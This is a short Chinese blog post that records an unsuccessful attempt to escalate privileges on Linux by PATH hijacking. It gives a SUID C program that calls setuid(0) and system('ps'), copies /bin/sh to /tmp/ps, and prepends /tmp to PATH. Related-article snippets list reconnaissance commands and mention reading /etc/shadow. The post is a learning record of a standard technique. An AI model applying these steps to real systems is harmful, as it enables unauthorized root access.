LINUX 环境变量提权(失败)

最新推荐文章于 2024-07-11 10:51:42 发布
最新推荐文章于 2024-07-11 10:51:42 发布
阅读量156 收藏
点赞数
分类专栏: Linux提权 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65096687/article/details/130845349
版权

环境变量提权

环境变量提权就是linux在执行系统命令的时候,会调用一些环境变量的文件。

然后我们对环境变量的文件进行替换。

比如说,执行id和执行/bin/id

效果是一样的,可以理解未win安装python时候需要添加环境变量,然后cmd可以直接运行python

接下来是复现过程

写一个c文件放到对方服务器上去编译成第三方软件

yx.c

#include<unistd.h>
void main()
{ setuid(0);
  setgid(0);
  system("ps");
}

这是c文件的内容,然后传到目标主机编译成第三方软件

 然后给yx文件SUID权限

 然后

替换

cp /bin/sh /tmp/ps 

export PATH=/tmp:$PATH

./yx

id   查看用户

好,提权失败

不知道为啥 

不过是三年五载
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
操作系统权限提升(二十一)之Linux提权-环境变量劫持提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-01 812
假设管理员用户在/home目录下创建了一个demo.c文件,内容如下,执行查看shadow文件命令,setuid 规定了其运行用户,以root权限进行编译和权限设置。如果我们可以在环境变量中写入自己的环境变量,然后写一个自己的恶意命令,从而达到提权的目的。接下来用命令查找SUID文件,发现一个shell文件被配置了SUID。运行shell文件,发现是查看/etc/shadow的命令。可以看到目前我们的用户是一个普通用户daoer的权限。那么我们劫持cat命令,达到提权的目的。接下来就可以进行提权了。
Linux系统环境变量
01-19
这涉及到环境变量 PATH 的设置问题,而 PATH 的设置也是在 linux 下定制环境变量的一个组成部分。本文基于 RedHat 9.0 ,详细讲解了环境变量定制的问题。  2、变量简介  Linux 是一个多用户的操作系统。每个用户...
Linux sudo 提权异常的情况
码农终结者的博客
02-04 544
这一篇主要记录几个关于 sudo 提权失败或者执行异常的情况
linux 提权总结
weixin_51681694的博客
06-13 7023
会继续补充.....
Linux: 普通用户使用sudo提权命令报错
StudyHappiness的博客
07-03 1858
Linux用户之间有权限隔离,为了防止root用户被多人掌握,导致泄漏,造成安全问题。通常要限制root的使用,但是在Linux使用期间,不可避免的要使用到更高的权限,因此给普通用户授予“提权”权限是最好的选择,本文介绍的是在授予权限过程中遇到的问题及解决方法。...
Linux权限
niqiu320的博客
05-24 928
Linux提权大全 日站就要日个彻底。往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。 Linux提权信息收集: 什么系统?什么版本? cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release # Redhat based 什么内核?是64位吗?
浅析Linux系统常规提权手段的原理与技巧
道阻且长,行则将至。
01-08 1248
渗透测试过程中,通过 Web 服务漏洞(比如文件上传漏洞)拿到服务器 Shell 后,经常会发现所获得的 Shell 仅有较低的权限,而为了进一步获得高权限 Shell(root),避免不了地就是进一步进行提权。本文来学习、总结下 Linux 系统一些常规的提权手段的原理与技巧。
Linux提权方法总结
Ays.Ie的博客
11-06 3531
Linux提权方式总结
Linux 环境变量详解及实例
01-20
Linux环境变量 ~/.bash_profile && ~/.bashrc 用户登陆Linux操作系统的时候,”/etc/profile”, “~/.bash_profile”等配置文件会被自动执行。 执行过程是这样的: 登陆Linux系统时,首先启动”/etc/profile”,...
自定义添加linux系统java环境变量脚本及安装包
06-23
各位小伙伴肯定都遇到过拿到一个linux环境发现没有java环境,又需要屁颠屁颠跑去找java安装包配置环境变量的问题吧? 本资源为二狗自己编写的快速定义java环境变量的脚本,可以帮助你剩下不少时间,操作前建议备份/...
判断Linux Shell环境变量是否存在
09-15
主要介绍了Linux Shell 判断环境变量是否存在的方法,非常不错,具有参考借鉴价值,需要的朋友可以参考下
Linux环境变量设置总结
07-29
Linux 环境变量设置总结 Linux 环境变量Linux 操作系统中一个重要的概念,它决定了系统的行为和用户的体验。环境变量是由一系列的名称和值组成的,它们可以影响系统的行为和应用程序的运行。 1. 环境变量的分类...
Linux】进程间通信(IPC)——匿名管道
2201_76024104的博客
07-08 1157
1.:一个进程需要将它的数据发送给另一个进程,比如我们有两个进程,一个负责获取数据,另一个负责处理数据,这时第一个进程就要将获取到的数据交给第二个进程2.:多个进程间共享同样的资源3.:一个进程需要给其他进程发送消息,通知他们发生了某种事件4.:有些事件需要完全控制另一个进程,比如我们在使用gdb调试时,gdb就是一个进程,它控制了我们要调试的进程进程之前是有互相传递信息的需求,但是,一个进程不可能去另一个进程的地址空间中取信息,所以这就要求操作系统去提供一块交换数据的空间来供进程之间使用。
Linux】 GCC/G++与Makefile使用
Long_kin的博客
07-11 955
收藏向 使用解析
Linux】:程序替换
Yikefore的博客
07-09 1086
程序替换的详细介绍以及各种程序替换接口介绍以及使用!
Linux —— 进程间通信
最新发布
学习C++的小陈同学
07-11 913
本篇整理了关于进程间通信的内容,以及详解的介绍了两种进程间通信的方式,以及相关的接口和代码演练
linux积累-core文件是干啥的
hebtu666
07-09 4055
核心转储(core dump)文件是一个程序崩溃时所产生的文件,它记录了程序崩溃时的内存状态,包括程序计数器和寄存器内容等信息。此外,如果程序是在特定的库或者环境中运行时崩溃的,你可能还需要安装那些库的调试符号,并在调试器中设置相应的环境变量。: 当你有了核心转储文件后,你可以使用像GDB(GNU调试器)这样的调试器来分析它。首先,你需要确保你有相应的程序的带调试符号的可执行文件。: 根据调试器提供的信息,你可以检查源代码中可能导致问题的部分,例如无效的指针引用、数组越界或其他违反程序逻辑的操作。
LVGL ArchLinux VSCode环境运行
Sandman06的博客
07-10 314
很多包在Arch中名字都不一样,我配合GPT,找到了相同功能的包,配合官方步骤,大致过程如下。vscode用AUR管理器安装”visual-studio-code-bin“LVGL官方的Demo是跑在Ubuntu系的系统上的。# 用如下指令代替Ubuntu系apt指令。git保证项目完整,各模块更新就能跑起来了。# VSCode安装。
linux环境变量提权原理
08-13
回答: 在Linux环境中,提权原理是通过修改可执行文件的权限或者改变执行环境变量来获取Root权限。一种方法是将可执行文件设置为Set-UID或Set-GID,并将其所有者设置为Root,这样当普通用户执行该文件时,实际上是以Root权限执行的。另一种方法是通过修改执行环境变量,例如修改PATH变量,使其指向一个恶意程序,当普通用户执行了这个程序时,就会以Root权限执行该程序,从而获取Root权限。这些方法都需要具备对文件的访问权限,一般只有Root用户才能对系统文件进行修改。<span class="em">1</span><span class="em">2</span> #### 引用[.reference_title] - *1* *2* [linux利用环境变量提权](https://blog.csdn.net/m0_63917373/article/details/130486423)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值